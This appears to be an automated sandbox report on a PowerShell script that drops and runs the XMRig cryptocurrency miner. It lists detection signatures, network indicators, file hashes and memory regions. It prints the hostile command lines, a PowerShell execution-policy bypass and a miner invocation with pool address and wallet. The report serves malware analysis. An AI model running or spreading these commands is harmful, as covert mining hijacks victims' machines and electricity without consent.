| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3424 wrote to memory of 4916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3424 wrote to memory of 4916 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.239.69.13.in-addr.arpa | udp |
Files
memory/3424-0-0x00007FF8E4853000-0x00007FF8E4855000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3i4xyta1.gor.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3424-10-0x000001CF68720000-0x000001CF68742000-memory.dmp
memory/3424-11-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-12-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-14-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-15-0x000001CF687B0000-0x000001CF687C2000-memory.dmp
memory/3424-16-0x000001CF687A0000-0x000001CF687AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4916-47-0x00000133268C0000-0x00000133268E0000-memory.dmp
memory/4916-48-0x00000133280C0000-0x00000133280E0000-memory.dmp
memory/4916-49-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-50-0x00000133280E0000-0x0000013328100000-memory.dmp
memory/4916-51-0x0000013328100000-0x0000013328120000-memory.dmp
memory/4916-52-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/3424-54-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/3424-53-0x00007FF8E4853000-0x00007FF8E4855000-memory.dmp
memory/3424-56-0x00007FF8E4850000-0x00007FF8E5311000-memory.dmp
memory/4916-55-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-57-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-58-0x00000133280E0000-0x0000013328100000-memory.dmp
memory/4916-59-0x0000013328100000-0x0000013328120000-memory.dmp
memory/4916-60-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-61-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-62-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-63-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-64-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-65-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-66-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-67-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-68-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-69-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-70-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-71-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-72-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-73-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-74-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-75-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-76-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-77-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-78-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-79-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-80-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-81-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-82-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-83-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-84-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-85-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-86-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-87-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-88-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-89-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-90-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-91-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-92-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-93-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-94-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-95-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-96-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-97-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-98-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-99-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-100-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-101-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-102-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-103-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-104-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-105-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-106-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-107-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-108-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-109-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-110-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-111-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-112-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-113-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-114-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-115-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-116-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-117-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
memory/4916-118-0x00007FF71A740000-0x00007FF71B373000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:53
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1788s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3288 wrote to memory of 4824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3288 wrote to memory of 4824 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
Files
memory/3288-0-0x00007FFAC0893000-0x00007FFAC0895000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j5ac50dy.miv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3288-9-0x00000153A0100000-0x00000153A0122000-memory.dmp
memory/3288-10-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/3288-11-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/3288-12-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/3288-14-0x00000153A01A0000-0x00000153A01B2000-memory.dmp
memory/3288-15-0x00000153A0190000-0x00000153A019A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4824-46-0x000001814CE50000-0x000001814CE70000-memory.dmp
memory/4824-47-0x000001814E870000-0x000001814E890000-memory.dmp
memory/4824-48-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/3288-49-0x00007FFAC0893000-0x00007FFAC0895000-memory.dmp
memory/3288-50-0x00007FFAC0890000-0x00007FFAC1352000-memory.dmp
memory/4824-52-0x000001814E8B0000-0x000001814E8D0000-memory.dmp
memory/4824-51-0x000001814E890000-0x000001814E8B0000-memory.dmp
memory/4824-53-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-54-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-55-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-57-0x000001814E8B0000-0x000001814E8D0000-memory.dmp
memory/4824-56-0x000001814E890000-0x000001814E8B0000-memory.dmp
memory/4824-58-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-59-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-60-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-61-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-62-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-63-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-64-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-65-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-66-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-67-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-68-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-69-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-70-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-71-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-72-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-73-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-74-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-75-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-76-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-77-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-78-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-79-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-80-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-81-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-82-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-83-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-84-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-85-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-86-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-87-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-88-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-89-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-90-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-91-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-92-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-93-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-94-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-95-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-96-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-97-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-98-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-99-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-100-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-101-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-102-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-103-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-104-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-105-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-106-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-107-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-108-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-109-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-110-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-111-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-112-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-113-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-114-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-115-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
memory/4824-116-0x00007FF6A7CA0000-0x00007FF6A88D3000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:58
Platform
win11-20240426-en
Max time kernel
1788s
Max time network
1762s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
